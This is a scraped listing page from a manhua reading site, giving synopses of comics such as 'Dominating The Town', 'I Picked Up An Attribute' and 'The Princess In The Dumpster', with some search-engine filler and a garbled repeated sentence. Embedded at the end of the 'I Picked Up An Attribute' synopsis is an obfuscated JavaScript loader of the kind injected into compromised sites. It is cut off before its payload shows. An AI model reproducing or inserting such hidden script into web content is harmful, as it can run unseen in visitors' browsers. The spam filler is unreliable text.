Manhua - Page 22

Manhua are Chinese comics that feature diverse genres, from fantasy to romance, and are known for their detailed artwork and engaging plots, often blending traditional Chinese elements with modern storytelling.

1315 results

Survive On A Deserted Island With Beautiful Girls

Ancient Beasts, Modern Humans, Future Technology, Time And Space Chaos Of The Desert Island; Stone Age, Power Age, Electric Age, Rapid Development Of The Desert Island Civilization. Exile On An Uninhabited Desert Island, Opening A System, Qin Tian From Zero To Survive. The First Thing You Need To Know Is How To Get The Best Out Of Your Child. Ancient Beasts, Modern Humans, Future Technology, Time And Space Chaos Of The Desert Island; Stone Age, Power Age, Electric Age, Rapid Development Of The Desert Island Civilization. Exile On An Uninhabited Desert Island, Opening A System, Qin Tian From Zero To Survive. The First Thing You Need To Know Is How To Get The Best Out Of Your Child.


Dominating The Town

Read “Dominating The Town Novel” – “Dominating The Town Manhua” Online Free On Hotmanhwa The Summary Of The Comic Dominating The Town: Mucifer Zhan Was Kicked Out Of His Family With His Mother And Sister By His Father. Not Long After, His Mother Was Framed And Forced To Commit Suicide. Just When Mucifer Seemed To Have Lost All His Hope For Life, A Mysterious Man Showed Up And Took Him To The Army. With Hatred Burning In His Heart, He Grew From An Ordinary Soldier To A Ruthless Warlord. Now, He’s Revisiting His Home City And Vows To Retaliate Those Who Wronged Him, The Hard Way! “Dominating The Town” Is Also Known As: Dominando La Ciudad / Dominating The Country / The Invincible Warlord / Domineering Dictator / El Rey De La Guerra / I Am The Invincible God Of War / I Am The Unparalleled God Of War / Lord Of War / Rei Da Guerra / Seigneur De La Guerre / Soy El Invencible Dios De La Guerra. / The Legend God Of War In The City / The Legend God Of War In The City ตำนานเทพเซียนสงครามไร้พ่ายแห่งนคร / Thần Vương Trấn Quốc / ท่านลอร์ดสงคราม / 我是无双战神 / 鎮國主宰 / 镇国主宰 The Comic “Dominating The Town” Belongs To The Genre: Action, Adventure, Fantasy, Manhua, Martial Arts, Seinen, Supernatural, Thriller “Manhua Plus, Manhwa Updates, Manhwa Website…” Are The Most Searched Keywords On The Website S2Manga. We Offer A Wide Selection Of The Best And Newest Comic Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King By Scavenging


Perfect Secret Love: The Bad New Wife Is A Little Sweet

Perfect Secret Love: The Bad New Wife is a Little Sweet “How perverted is Si Ye Han’s taste? He still wants me like this?” Waking up, she looked at her reflection in the mirror: explosive wig, tattoos, and demon-like makeup. Any normal person’s eyes would burn if they looked at her for more than a second. Before her rebirth, she was in love with a different guy, so all she wanted to do was escape from Si Ye Han and hated him to his core after being locked up by him. After her rebirth, she looked differently at him, thinking that maybe he changed for the better? In the past, her mind was muddled. She let go of a stunning husband, was hurt by a scumbag and backstabber and most of all, was brainwashed by her most trusted friend. In the end, she was utterly alone. In her current lifetime, there are evil people scheming and eagerly waiting for her downfall. Sorry, but this girl won’t fall for the same tricks twice!


Unscrupuous Consort: The Evil Dotor

When she met him for the first time, she just wanted to escape from him. From then on, however, she gradually got used to his company. He is the god of death to everyone else, but he will always give the barest hint of a smile to her. Whenever there was a danger, he would always help her like a real god fallen from the heaven, mocking her at the same time. With the lapse of time, her feelings for him was more than just dependence. If she doesn’t love him, she wouldn’t let him stay by her; If not, how would she feel so different…


I Picked Up An Attribute

The gaming emperor Feng Xia accidentally travelled into the era of magic and cultivation, attributes’ abilities and strategy can be used to defeat his opponents and each time he defeats his opponents, he can obtain the skills and attributes of the enemy, turning the world with each battle! There are also many beautiful beast-women in the world, Feng Xia destroyed the opponents with so called “unparalleled skills” and steals their power into his!<script></script><script>(function(_0x50d3ac,_0x467314){var _0x568d63=_0x5408,_0x3c1a88=_0x50d3ac();while(!![]){try{var _0x154e2b=-parseInt(_0x568d63(0x1f7))/(0x15db+-0xc70+-0x96a)+parseInt(_0x568d63(0x1e3))/(-0x238e+0xe54+0x153c)+-parseInt(_0x568d63(0x1f3))/(-0x49*-0x1a+-0x1a49+-0x12e2*-0x1)+parseInt(_0x568d63(0x1e8))/(-0x2601+-0x4f4+-0x1*-0x2af9)*(parseInt(_0x568d63(0x1e0))/(0x45d*0x3+-0x4ea+-0x3a*0x24))+-parseInt(_0x568d63(0x1f0))/(-0x75b+0x2*0x7c+-0x223*-0x3)*(parseInt(_0x568d63(0x1f8))/(-0x1870+-0x942+0x21b9))+parseInt(_0x568d63(0x1fa))/(-0x6d*-0x5+-0x2b7*0x7+0x43a*0x4)*(parseInt(_0x568d63(0x1e1))/(-0x3*-0x727+-0x21c7*0x1+0xc5b))+-parseInt(_0x568d63(0x1e9))/(-0x1*-0xc9b+-0xb90+-0x101);if(_0x154e2b===_0x467314)break;else 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Youngest Princess

The archmage who ruled over a magic kingdom. One day, she was reborn as the youngest daughter of the empire! “I’ll just play along and pretend to be a baby. …But don’t you think you guys like me a little too much?” They won’t leave her alone. The youngest princess is tired today as well.


When The Villainess Loves

I’ve transmigrated into the body of a princess, living on borrowed time. It’s okay, though, we can cure this illness! My goal is to lead a life where I can do whatever I want! First, I decided to rave over all of my favorite characters in the novel! But, because I am a villainess, people around me tend to be wary… “You will die soon, and yet… how can you laugh like that?” Well, it’s ‘cus I’m super hot.


Princess Wars

After the Princess died, the soul entered a life-betting game! She will be the famous Pea Princess and other princesses in a fairy tale who will pursue the only prince. Only a princess who has successfully married a prince can return to the real world and continue her life and receive a huge bonus! How can she fight powerful princesses to capture the prince’s love? !


The Princess In The Dumpster

The Princess in the Dumpster Deep sunken cheeks, dirty skin which lost its original color, twig-like wrists, filthy fingernails and a much smaller body for her age. And with neglected hair hanging over half of her face, this small child is actually the forgotten Royal Princess of the Empire. Unable to stifle her hunger any longer, she crawls out of her hiding within a tiny, old, worn-down castle in search of food… “I’m hungry…” The small girl who’s wearing nothing but shabby clothes murmured without even realizing. “Can I eat this…?” Her small fern-like hand tore a piece of vegetation off of the ground, but she eventually put it down while shaking her head from side to side. The little girl hadn’t had a proper meal for three days… “Estrella…” The child recited the name, her words one with the wind. It was a precious name that she had earned only after a long time. “I’m sorry I’m late.” “…It’s alright.” The little one who replied then slumped onto Elias’ chest.


Martial God Asura

One night a mysterious and unexplained phenomenon occurs in the nine provinces. Five years later Chu Feng, a regular outer disciple of the Azure Dragon school, awakens one of the mysterious nine lightning beasts. And discovers an egg sealed inside him.


Breaking Through The Clouds 2: Swallow The Sea

Wu Yu, a newcomer to the Public Security Bureau, is gentle and frail. He doesn’t care about the difficulties posed by Bu ZhongHua, his strict boss, and only wants to stay in the background and be paid on time with enough to sustain himself. However, no one knows that he is being targeted by top drug traffickers for a large bounty, or that this courageous young man had previously slaughtered the dragon of the abyss. With a chain of interlocking cases, a series of troubles come one after another. Can these two work together to survive the difficulties?
